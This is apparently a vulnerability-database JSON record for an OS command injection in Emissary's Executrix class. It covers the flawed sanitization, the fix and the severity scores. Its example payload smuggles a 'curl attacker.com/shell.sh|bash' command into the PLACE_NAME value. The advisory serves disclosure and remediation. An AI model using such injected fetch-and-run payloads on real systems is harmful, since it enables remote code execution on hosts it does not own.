{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/350526?format=json","vulnerability_id":"VCID-vst1-rzvp-9bec","summary":"Emissary has a Command Injection via PLACE_NAME Configuration in Executrix\n## Summary\n\nThe `Executrix` utility class constructed shell commands by concatenating\nconfiguration-derived values — including the `PLACE_NAME` parameter — with\ninsufficient sanitization. Only spaces were replaced with underscores, allowing\nshell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through\ninto `/bin/sh -c` command execution.\n\n## Details\n\n### Vulnerable code — `Executrix.java`\n\n**Insufficient sanitization (line 132):**\n```java\nthis.placeName = this.placeName.replace(' ', '_');\n// ONLY replaces spaces — shell metacharacters pass through\n```\n\n**Shell sink (line 1052–1058):**\n```java\nprotected String[] getTimedCommand(final String c) {\n    return new String[] {\"/bin/sh\", \"-c\", \"ulimit -c 0; cd \" + tmpNames[DIR] + \"; \" + c};\n}\n```\n\n### Data flow\n\n1. `PLACE_NAME` is read from a configuration file\n2. `Executrix` applies only a space-to-underscore replacement\n3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)\n4. `tmpNames[DIR]` is concatenated into a shell command string\n5. The command is executed via `/bin/sh -c`\n\n### Example payload\n\n```\nPLACE_NAME = \"test;curl attacker.com/shell.sh|bash;x\"\n```\n\nAfter the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`\n(semicolons, pipes, and other metacharacters preserved)\n\n### Impact\n\n- Arbitrary command execution on the Emissary host\n- Requires the ability to control configuration values (e.g., administrative\n  access or a compromised configuration source)\n\n## Remediation\n\nFixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),\nmerged into release 8.39.0.\n\nThe space-only replacement was replaced with an allowlist regex that strips all\ncharacters not matching `[a-zA-Z0-9_-]`:\n\n```java\nprotected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile(\"[^a-zA-Z0-9_-]\");\n\nprotected static String cleanPlaceName(final String placeName) {\n    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll(\"_\");\n}\n```\n\nThis ensures that any shell metacharacter in the `PLACE_NAME` configuration\nvalue is replaced with an underscore before it can reach a command string.\n\nTests were added to verify that parentheses, slashes, dots, hash, dollar signs,\nbackslashes, quotes, semicolons, carets, and at-signs are all sanitized.\n\n## Workarounds\n\nIf upgrading is not immediately possible, ensure that `PLACE_NAME` values in all\nconfiguration files contain only alphanumeric characters, underscores, and hyphens.\n\n## References\n\n- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)\n- Original report: GHSA-wjqm-p579-x3ww","aliases":[{"alias":"CVE-2026-35581"},{"alias":"GHSA-6c37-7w4p-jg9v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1048895?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.39.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0"}],"affected_packages":[],"references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35581","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18402","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18398","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18451","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.1845","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00077","scoring_system":"epss","scoring_elements":"0.22992","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00077","scoring_system":"epss","scoring_elements":"0.23005","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24993","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24903","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24965","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24848","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24892","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24727","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35581"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/pull/1290","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/pull/1290"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-08T14:57:38Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35581","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35581"},{"reference_url":"https://github.com/advisories/GHSA-6c37-7w4p-jg9v","reference_id":"GHSA-6c37-7w4p-jg9v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6c37-7w4p-jg9v"}],"weaknesses":[{"cwe_id":78,"name":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","description":"The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}],"exploits":[],"severity_range_score":"7.0 - 8.9","exploitability":null,"weighted_severity":null,"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vst1-rzvp-9bec"}